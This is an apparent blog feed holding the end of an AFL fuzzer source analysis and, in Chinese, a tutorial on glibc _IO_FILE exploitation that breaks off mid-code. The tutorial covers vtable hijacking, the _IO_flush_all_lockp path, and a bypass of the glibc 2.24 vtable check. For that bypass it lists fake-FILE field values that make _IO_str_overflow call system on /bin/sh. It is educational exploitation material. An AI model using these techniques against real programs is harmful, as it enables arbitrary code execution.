href="#arith-16-x2F-8" class="headerlink" title="arith 16/8"></a>arith 16/8</h4><p>Adds to and subtracts from 16 bits at a time, stepping 8 bits; both little-endian and big-endian addition and subtraction are tested</p><h4 id="arith-32-x2F-8"><a href="#arith-32-x2F-8" class="headerlink" title="arith 32/8"></a>arith 32/8</h4><p>Adds to and subtracts from 32 bits at a time, stepping 8 bits; both little-endian and big-endian addition and subtraction are tested</p><h3 id="INTERESTING-VALUES阶段"><a href="#INTERESTING-VALUES阶段" class="headerlink" title="INTERESTING VALUES stage"></a><strong>INTERESTING VALUES stage</strong></h3><p>Replaces file content with "interesting values", a fixed set of constants</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">static s8 interesting_8[] = { INTERESTING_8 };<br>static s16 interesting_16[] = { INTERESTING_8, INTERESTING_16 };<br>static s32 interesting_32[] = { INTERESTING_8, INTERESTING_16, INTERESTING_32 };<br></code></pre></td></tr></table></figure><p><img src="/image-20220504094722901.png" alt="Interesting values"></p><h4 id="interest-8-x2F-8"><a href="#interest-8-x2F-8" class="headerlink" title="interest 8/8"></a>interest 8/8</h4><p>Replaces 8 bits at a time, stepping 8 bits</p><ol><li><p>Walk the case</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">for (i = 0; i < len; i++)<br></code></pre></td></tr></table></figure></li><li><p>Check that the eff_map entry is non-zero</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">if (!eff_map[EFF_APOS(i)])<br></code></pre></td></tr></table></figure></li><li><p>Walk the replacement values</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">for (j = 0; j < sizeof(interesting_8); j++)<br></code></pre></td></tr></table></figure></li><li><p>The new case must not be one that bitflip or arith could already have generated</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">if (could_be_bitflip(orig ^ (u8)interesting_8[j]) ||<br> could_be_arith(orig, (u8)interesting_8[j], 1))<br></code></pre></td></tr></table></figure></li><li><p>Plain execution, then restore the original case</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">stage_cur_val = interesting_8[j];<br>out_buf[i] = interesting_8[j];<br>if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry;<br>out_buf[i] = orig;<br></code></pre></td></tr></table></figure></li></ol><h4 id="interest-16-x2F-8"><a href="#interest-16-x2F-8" class="headerlink" title="interest 16/8"></a>interest 16/8</h4><p>Replaces 16 bits at a time, stepping 8 bits</p><h4 id="interest-32-x2F-8"><a href="#interest-32-x2F-8" class="headerlink" title="interest 32/8"></a>interest 32/8</h4><p>Replaces 32 bits at a time, stepping 8 bits</p><h3 id="DICTIONARY-STUFF阶段"><a href="#DICTIONARY-STUFF阶段" class="headerlink" title="DICTIONARY STUFF stage"></a><strong>DICTIONARY STUFF stage</strong></h3><p>Tokens from the user-supplied dictionary replace the file content being mutated; if the user supplied no dictionary, the tokens generated automatically during bitflip are used instead</p><h4 id="user-extras-over"><a href="#user-extras-over" class="headerlink" title="user extras (over)"></a>user extras (over)</h4><p>With an 8-bit step, overwrite the content from the marked start position with a token</p><ol><li><p>Every byte gets replaced once</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">for (i = 0; i < len; i++)<br></code></pre></td></tr></table></figure></li><li><p>Walk the user dictionary</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">for (j = 0; j < extras_cnt; j++)<br></code></pre></td></tr></table></figure></li><li><p>Skip the current token in the following situations</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">if ((extras_cnt > MAX_DET_EXTRAS && UR(extras_cnt) >= MAX_DET_EXTRAS) ||<br> extras[j].len > len - i ||<br> !memcmp(extras[j].data, out_buf + i, extras[j].len) ||<br> !memchr(eff_map + EFF_APOS(i), 1, EFF_SPAN_ALEN(i, extras[j].len)))<br></code></pre></td></tr></table></figure><ul><li>the dictionary has more than 200 tokens and a random number drawn below the token count is still >= 200</li><li>the token would run past the end of the original case</li><li>the data in the case is already identical to the token</li><li>eff_map is 0 across the span</li></ul></li><li><p>Write the token in and run the new case</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">last_len = extras[j].len;<br>memcpy(out_buf + i, extras[j].data, last_len);<br>if (common_fuzz_stuff(argv, out_buf, len))<br></code></pre></td></tr></table></figure></li><li><p>After all tokens have been tried, restore the content and go back to step 1</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">memcpy(out_buf + i, in_buf + i, last_len);<br></code></pre></td></tr></table></figure></li></ol><h4 id="user-extras-insert"><a href="#user-extras-insert" class="headerlink" title="user extras (insert)"></a>user extras (insert)</h4><p>With an 8-bit step, insert a token at the marked start position</p><h4 id="auto-extras-over"><a href="#auto-extras-over" class="headerlink" title="auto extras (over)"></a>auto extras (over)</h4><p>With an 8-bit step, overwrite the content from the marked start position with a token generated in the bitflip stage</p><p>This is the last of the <em>deterministic steps</em></p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">if (!queue_cur->passed_det) mark_as_det_done(queue_cur);<br></code></pre></td></tr></table></figure><p>so the done state is recorded here</p><h3 id="RANDOM-HAVOC阶段"><a href="#RANDOM-HAVOC阶段" class="headerlink" title="RANDOM HAVOC stage"></a><strong>RANDOM HAVOC stage</strong></h3><p>Applies heavy, chaotic mutation with many rules and a great deal of randomness; it effectively generates new cases</p><h3 id="SPLICING阶段"><a href="#SPLICING阶段" class="headerlink" title="SPLICING stage"></a><strong>SPLICING stage</strong></h3><p>Splices two cases together according to certain rules to obtain a new case</p><p>HAVOC and SPLICING work together: after splicing, control returns to havoc for random mutation</p><p>References:</p><ol><li><p>AFL source reading notes: the gcc and fuzz parts <a href="https://bbs.pediy.com/thread-265936.htm">https://bbs.pediy.com/thread-265936.htm</a></p></li><li><p>AFL source analysis <a href="https://blog.csdn.net/song_lee/article/details/108244627">https://blog.csdn.net/song_lee/article/details/108244627</a></p></li><li><p>Vulnerability discovery techniques: an analysis of the AFL project <a href="https://bbs.pediy.com/thread-249912.htm">https://bbs.pediy.com/thread-249912.htm</a></p></li></ol>]]></content>
<tags>
<tag>Fuzz</tag>
</tags>
</entry>
<entry>
<title>A brief analysis of the IO_FILE structure and its exploitation</title>
<link href="/2022/03/14/IO-FILE%E7%BB%93%E6%9E%84%E5%92%8C%E5%88%A9%E7%94%A8%E7%AE%80%E6%9E%90/"/>
<url>/2022/03/14/IO-FILE%E7%BB%93%E6%9E%84%E5%92%8C%E5%88%A9%E7%94%A8%E7%AE%80%E6%9E%90/</url>
<content type="html"><![CDATA[<h2 id="基本数据结构"><a href="#基本数据结构" class="headerlink" title="基本数据结构"></a>基本数据结构</h2><p>数据结构在glibc版本更新中的变化不大,所以可以从最简单的2.23代码开始分析</p><p>_IO_list_all 是一个 _IO_FILE_plus 结构体定义的一个指针</p><p> _IO_FILE_plus结构体由两个部分组成,分为<code>_IO_FILE</code>和<code>_IO_jump_t</code>指针</p><figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs gauss"><span class="hljs-built_in">extern</span> <span class="hljs-keyword">struct</span> <span class="hljs-type">_IO_FILE_plus</span> *_IO_list_all;<br><span class="hljs-keyword">struct</span> <span class="hljs-type">_IO_FILE_plus</span><br>{<br> _IO_FILE file;<br> const <span class="hljs-keyword">struct</span> <span class="hljs-type">_IO_jump_t</span> *vtable;<br>};<br></code></pre></td></tr></table></figure><p><code>_IO_FILE</code>结构</p><figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span 
class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><code class="hljs sqf">struct <span class="hljs-variable">_IO_FILE</span> {<br> int <span class="hljs-variable">_flags</span>;<span class="hljs-comment">/* High-order word is _IO_MAGIC; rest is flags. */</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> _IO_file_flags _flags</span><br><br> <span class="hljs-comment">/* The following pointers correspond to the C++ streambuf protocol. */</span><br> <span class="hljs-comment">/* <span class="hljs-doctag">Note:</span> Tk uses the _IO_read_ptr and _IO_read_end fields directly. */</span><br> char* <span class="hljs-variable">_IO_read_ptr</span>;<span class="hljs-comment">/* Current read pointer */</span><br> char* <span class="hljs-variable">_IO_read_end</span>;<span class="hljs-comment">/* End of get area. 
*/</span><br> char* <span class="hljs-variable">_IO_read_base</span>;<span class="hljs-comment">/* Start of putback+get area. */</span><br> char* <span class="hljs-variable">_IO_write_base</span>;<span class="hljs-comment">/* Start of put area. */</span><br> char* <span class="hljs-variable">_IO_write_ptr</span>;<span class="hljs-comment">/* Current put pointer. */</span><br> char* <span class="hljs-variable">_IO_write_end</span>;<span class="hljs-comment">/* End of put area. */</span><br> char* <span class="hljs-variable">_IO_buf_base</span>;<span class="hljs-comment">/* Start of reserve area. */</span><br> char* <span class="hljs-variable">_IO_buf_end</span>;<span class="hljs-comment">/* End of reserve area. */</span><br> <span class="hljs-comment">/* The following fields are used to support backing up and undo. */</span><br> char *<span class="hljs-variable">_IO_save_base</span>; <span class="hljs-comment">/* Pointer to start of non-current get area. */</span><br> char *<span class="hljs-variable">_IO_backup_base</span>; <span class="hljs-comment">/* Pointer to first valid character of backup area */</span><br> char *<span class="hljs-variable">_IO_save_end</span>; <span class="hljs-comment">/* Pointer to end of non-current get area. 
*/</span><br> struct <span class="hljs-variable">_IO_marker</span> *<span class="hljs-variable">_markers</span>;<br> struct <span class="hljs-variable">_IO_FILE</span> *<span class="hljs-variable">_chain</span>;<br> int <span class="hljs-variable">_fileno</span>;<br><span class="hljs-meta">#<span class="hljs-keyword">if</span> 0</span><br> int <span class="hljs-variable">_blksize</span>;<br><span class="hljs-meta">#<span class="hljs-keyword">else</span></span><br> int <span class="hljs-variable">_flags2</span>;<br><span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br> <span class="hljs-variable">_IO_off_t</span> <span class="hljs-variable">_old_offset</span>; <span class="hljs-comment">/* This used to be _offset but it's too small. */</span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> __HAVE_COLUMN <span class="hljs-comment">/* temporary */</span></span><br> <span class="hljs-comment">/* 1+column number of pbase(); 0 is unknown. */</span><br> unsigned short <span class="hljs-variable">_cur_column</span>;<br> signed char <span class="hljs-variable">_vtable_offset</span>;<br> char <span class="hljs-variable">_shortbuf</span>[<span class="hljs-number">1</span>];<br><br> <span class="hljs-comment">/* char* _save_gptr; char* _save_egptr; */</span><br><br> <span class="hljs-variable">_IO_lock_t</span> *<span class="hljs-variable">_lock</span>;<br><span class="hljs-meta">#<span class="hljs-keyword">ifdef</span> _IO_USE_OLD_IO_FILE</span><br>};<br><br>struct <span class="hljs-variable">_IO_FILE_complete</span><br>{<br> struct <span class="hljs-variable">_IO_FILE</span> <span class="hljs-variable">_file</span>;<br><span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">if</span> defined _G_IO_IO_FILE_VERSION && _G_IO_IO_FILE_VERSION == 0x20001</span><br> <span class="hljs-variable">_IO_off64_t</span> <span class="hljs-variable">_offset</span>;<br><span 
class="hljs-meta"># <span class="hljs-keyword">if</span> defined _LIBC || defined _GLIBCPP_USE_WCHAR_T</span><br> <span class="hljs-comment">/* Wide character stream stuff. */</span><br> struct <span class="hljs-variable">_IO_codecvt</span> *<span class="hljs-variable">_codecvt</span>;<br> struct <span class="hljs-variable">_IO_wide_data</span> *<span class="hljs-variable">_wide_data</span>;<br> struct <span class="hljs-variable">_IO_FILE</span> *<span class="hljs-variable">_freeres_list</span>;<br> void *<span class="hljs-variable">_freeres_buf</span>;<br><span class="hljs-meta"># <span class="hljs-keyword">else</span></span><br> void *<span class="hljs-variable">__pad1</span>;<br> void *<span class="hljs-variable">__pad2</span>;<br> void *<span class="hljs-variable">__pad3</span>;<br> void *<span class="hljs-variable">__pad4</span>;<br><span class="hljs-meta"># <span class="hljs-keyword">endif</span></span><br> size_t <span class="hljs-variable">__pad5</span>;<br> int <span class="hljs-variable">_mode</span>;<br> <span class="hljs-comment">/* Make sure we don't get into trouble again. 
*/</span><br> char <span class="hljs-variable">_unused2</span>[<span class="hljs-number">15</span> * <span class="hljs-built_in">sizeof</span> (int) - <span class="hljs-number">4</span> * <span class="hljs-built_in">sizeof</span> (void *) - <span class="hljs-built_in">sizeof</span> (size_t)];<br><span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br>};<br></code></pre></td></tr></table></figure><p>FILE结构通过其中的 <code>_chain</code>形成链表,_IO_list_all指向链表起始位置,顺序为<code>_IO_list_all->stderr->stdout->stdin</code></p><p>64位 <code>_IO_FILE_plus</code>内部偏移如下:</p><figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs sqf"><span class="hljs-number">0</span>x0 <span class="hljs-variable">_flags</span><br><span class="hljs-number">0</span>x8 <span class="hljs-variable">_IO_read_ptr</span><br><span class="hljs-number">0</span>x10 <span class="hljs-variable">_IO_read_end</span><br><span class="hljs-number">0</span>x18 <span 
class="hljs-variable">_IO_read_base</span><br><span class="hljs-number">0</span>x20 <span class="hljs-variable">_IO_write_base</span><br><span class="hljs-number">0</span>x28 <span class="hljs-variable">_IO_write_ptr</span><br><span class="hljs-number">0</span>x30 <span class="hljs-variable">_IO_write_end</span><br><span class="hljs-number">0</span>x38 <span class="hljs-variable">_IO_buf_base</span><br><span class="hljs-number">0</span>x40 <span class="hljs-variable">_IO_buf_end</span><br><span class="hljs-number">0</span>x48 <span class="hljs-variable">_IO_save_base</span><br><span class="hljs-number">0</span>x50 <span class="hljs-variable">_IO_backup_base</span><br><span class="hljs-number">0</span>x58 <span class="hljs-variable">_IO_save_end</span><br><span class="hljs-number">0</span>x60 <span class="hljs-variable">_markers</span><br><span class="hljs-number">0</span>x68 <span class="hljs-variable">_chain</span><br><span class="hljs-number">0</span>x70 <span class="hljs-variable">_fileno</span><br><span class="hljs-number">0</span>x74 <span class="hljs-variable">_flags2</span><br><span class="hljs-number">0</span>x78 <span class="hljs-variable">_old_offset</span><br><span class="hljs-number">0</span>x80 <span class="hljs-variable">_cur_column</span><br><span class="hljs-number">0</span>x82 <span class="hljs-variable">_vtable_offset</span><br><span class="hljs-number">0</span>x83 <span class="hljs-variable">_shortbuf</span><br><span class="hljs-number">0</span>x88 <span class="hljs-variable">_lock</span><br><span class="hljs-number">0</span>x90 <span class="hljs-variable">_offset</span><br><span class="hljs-number">0</span>x98 <span class="hljs-variable">_codecvt</span><br><span class="hljs-number">0</span>xa0 <span class="hljs-variable">_wide_data</span><br><span class="hljs-number">0</span>xa8 <span class="hljs-variable">_freeres_list</span><br><span class="hljs-number">0</span>xb0 <span class="hljs-variable">_freeres_buf</span><br><span 
class="hljs-number">0</span>xb8 <span class="hljs-variable">__pad5</span><br><span class="hljs-number">0</span>xc0 <span class="hljs-variable">_mode</span><br><span class="hljs-number">0</span>xc4 <span class="hljs-variable">_unused2</span><br><span class="hljs-number">0</span>xd8 vtable<br></code></pre></td></tr></table></figure><p>vtable是<code>_IO_jump_t</code>类型的指针,<code>_IO_jump_t</code>中保存了一些函数指针,在后面我们会看到在一系列标准IO函数中会调用这些函数指针,该类型在libc文件中的导出符号是<code>_IO_file_jumps</code>,<code>_IO_jump_t</code>如下:</p><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs reasonml"><span class="hljs-keyword">struct</span> _IO_jump_t<br>{<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">size_t</span>, <span class="hljs-params">__dummy</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">size_t</span>, <span class="hljs-params">__dummy2</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_finish_t</span>, <span 
class="hljs-params">__finish</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_overflow_t</span>, <span class="hljs-params">__overflow</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_underflow_t</span>, <span class="hljs-params">__underflow</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_underflow_t</span>, <span class="hljs-params">__uflow</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_pbackfail_t</span>, <span class="hljs-params">__pbackfail</span>)</span>;<br> <span class="hljs-comment">/* showmany */</span><br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_xsputn_t</span>, <span class="hljs-params">__xsputn</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_xsgetn_t</span>, <span class="hljs-params">__xsgetn</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_seekoff_t</span>, <span class="hljs-params">__seekoff</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_seekpos_t</span>, <span class="hljs-params">__seekpos</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_setbuf_t</span>, <span class="hljs-params">__setbuf</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_sync_t</span>, <span class="hljs-params">__sync</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_doallocate_t</span>, <span class="hljs-params">__doallocate</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_read_t</span>, <span class="hljs-params">__read</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_write_t</span>, <span class="hljs-params">__write</span>)</span>;<br> <span 
class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_seek_t</span>, <span class="hljs-params">__seek</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_close_t</span>, <span class="hljs-params">__close</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_stat_t</span>, <span class="hljs-params">__stat</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_showmanyc_t</span>, <span class="hljs-params">__showmanyc</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_imbue_t</span>, <span class="hljs-params">__imbue</span>)</span>;<br>#<span class="hljs-keyword">if</span> <span class="hljs-number">0</span><br> get_column;<br> set_column;<br>#endif<br>};<br></code></pre></td></tr></table></figure><p>每一个FILE结构中的vtable指针指向同一个位置,通常会将_IO_overflow_t,改为system或onegadget地址完成利用。</p><p>输出函数调用<code>_IO_file_xsputn</code>,输入函数调用<code>_IO_file_xsgetn</code></p><p>一些c函数对_IO_jump_t虚表里面函数的调用情况:</p><ul><li>printf/puts 最终会调用<code>_IO_file_xsputn</code></li><li>fclose 最终会调用<code>_IO_FILE_FINISH</code></li><li>fwrite最终会调用<code>_IO_file_xsputn</code></li><li>fread 最终会调用<code>_IO_file_xsgetn</code></li><li>scanf/gets最终会调用<code>_IO_file_xsgetn</code></li></ul><h2 id="IO-flush-all-lockp"><a href="#IO-flush-all-lockp" class="headerlink" title="_IO_flush_all_lockp"></a>_IO_flush_all_lockp</h2><p>调用<code>_IO_flush_all_lockp</code>时,这个函数会刷新<code>_IO_list_all</code> 链表中所有项的文件流,相当于对每个 FILE 调用 fflush,也对应着会调用<code>_IO_FILE_plus.vtable</code> 中的_IO_overflow</p><p>我们重点关注这个函数及相关调用是因为攻击者常常利用这个函数来进行一系列的攻击操作</p><figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 
class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs sqf">int<br><span class="hljs-variable">_IO_flush_all_lockp</span> (int do_lock)<br>{<br> ...<br> fp = (<span class="hljs-variable">_IO_FILE</span> *) <span class="hljs-variable">_IO_list_all</span>;<br> <span class="hljs-keyword">while</span> (fp != NULL)<br> {<br> ...<br> <span class="hljs-keyword">if</span> (((fp-><span class="hljs-variable">_mode</span> <= <span class="hljs-number">0</span> && fp-><span class="hljs-variable">_IO_write_ptr</span> > fp-><span class="hljs-variable">_IO_write_base</span>))<br> && <span class="hljs-variable">_IO_OVERFLOW</span> (fp, EOF) == EOF)<br> {<br> result = EOF;<br> }<br> ...<br> }<br>}<br></code></pre></td></tr></table></figure><p>_IO_flush_all_lockp 不需要攻击者手动调用,在一些情况下这个函数会被系统调用:</p><ol><li><p>当 libc 执行 abort 流程时</p></li><li><p>当执行 exit 函数时</p></li><li><p>当执行流从 main 函数返回时</p></li></ol><p>且为了使<code>_IO_flush_all_lockp</code>能正常工作,我们要满足调用<code>_IO_OVERFLOW</code>的其他条件,即</p><ul><li>fp->_mode <= 0</li><li>fp-><code>_IO_write_ptr</code> > fp-><code>_IO_write_base</code></li></ul><p>由此构造<code>_IO_FILE_plus</code>和vtable的<code>_IO_OVERFLOW</code>(位于0x18偏移处)</p><h2 id="2-24新增检测"><a href="#2-24新增检测" class="headerlink" title="2.24新增检测"></a>2.24新增检测</h2><p>2.23可以直接把vtable劫持到可写字段,但是在2.24加入了对vtable地址的检验<code>IO_validate_vtable</code>,调用虚函数前会检查vtable的地址是否在一定范围内,不符则引发abort。</p><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td 
class="code"><pre><code class="hljs abnf">IO_validate_vtable (const struct _IO_jump_t *vtable)<br>{<br> uintptr_t section_length <span class="hljs-operator">=</span> __stop___libc_IO_vtables - __start___libc_IO_vtables<span class="hljs-comment">;</span><br> uintptr_t ptr <span class="hljs-operator">=</span> (uintptr_t) vtable<span class="hljs-comment">;</span><br> uintptr_t offset <span class="hljs-operator">=</span> ptr - (uintptr_t) __start___libc_IO_vtables<span class="hljs-comment">;</span><br> if (__glibc_unlikely (offset ><span class="hljs-operator">=</span> section_length))<br> _IO_vtable_check ()<span class="hljs-comment">;</span><br> return vtable<span class="hljs-comment">;</span><br>}<br></code></pre></td></tr></table></figure><p>我们注意到在给定范围内还存在了一些与原本vtable结构相同的虚表——<code>_IO_str_jumps</code>和<code>IO_wstr_jumps</code>只要对他们进行构造同样能实现利用</p><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">const <span class="hljs-keyword">struct</span> _IO_jump_t _IO_str_jumps libio_vtable =<br>{<br> JUMP_INIT_DUMMY, (size=<span class="hljs-number">0x10</span>)<br> <span class="hljs-constructor">JUMP_INIT(<span class="hljs-params">finish</span>, <span class="hljs-params">_IO_str_finish</span>)</span>,<br> <span class="hljs-constructor">JUMP_INIT(<span class="hljs-params">overflow</span>, <span class="hljs-params">_IO_str_overflow</span>)</span>,<br> <span class="hljs-constructor">JUMP_INIT(<span class="hljs-params">underflow</span>, <span class="hljs-params">_IO_str_underflow</span>)</span>,<br> ……<br> }<br></code></pre></td></tr></table></figure><p>先看<code>_IO_str_jumps</code>的_IO_str_overflow</p><figure class="highlight moonscript"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs moonscript">#define _IO_blen(fp) (<span class="hljs-function"><span class="hljs-params">(fp)</span>-></span>_IO_buf_end - (fp)->_IO_buf_base)<br>_IO_str_overflow (_IO_FILE *fp, int c)<br>{<br> ……<br> size_t old_blen = _IO_blen (fp);<br> _IO_size_t new_size = <span class="hljs-number">2</span> * old_blen + <span class="hljs-number">100</span>;<br> <span class="hljs-keyword">if</span> (new_size < old_blen)<br> <span class="hljs-keyword">return</span> EOF;<br><span class="hljs-function"> <span class="hljs-title">new_buf</span></span><br><span class="hljs-function"> = <span class="hljs-params">(char *)</span> <span class="hljs-params">(*((_IO_strfile *) fp)->_s._allocate_buffer)</span> <span class="hljs-params">(new_size)</span>;</span><br><span class="hljs-function"> ……</span><br><span class="hljs-function">}</span><br></code></pre></td></tr></table></figure><p>其中<code>_s._allocate_buffer</code>指向fp+0xe8偏移处,因为newsize的值需要通过计算得到,注意使/bin/sh的地址为2的倍数</p><p>由此,我们需要构造条件</p><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs xl"><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_read_ptr = <span class="hljs-number">0</span>x61 , smallbin4 + <span 
class="hljs-number">8</span> (smallbin size)<br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_<span class="hljs-function"><span class="hljs-title">read_base</span> = _IO_list_all -0x10 , smallbin -></span> bk, unsorted bin attack <br>(以上为绕过_IO_flush_all_lockp的条件)<br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_flags = <span class="hljs-number">0</span><br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_buf_base = <span class="hljs-number">0</span><br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_buf_end = (bin_sh_addr - <span class="hljs-number">100</span>) / <span class="hljs-number">2</span>#如果bin/sh地址以奇数结尾可以+<span class="hljs-number">1</span>以避免向下取整<br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_write_ptr = (bin_sh_addr - <span class="hljs-number">100</span>) / <span class="hljs-number">2</span><br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_write_base = <span class="hljs-number">0</span><br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_mode = -<span class="hljs-number">1</span> (等价于EOF)<br>fp+<span class="hljs-number">0</span>xe0 = system<br></code></pre></td></tr></table></figure><p>也可以利用<code>_IO_str_jumps</code>的_IO_str_finish</p><figure class="highlight livescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs livescript"><span 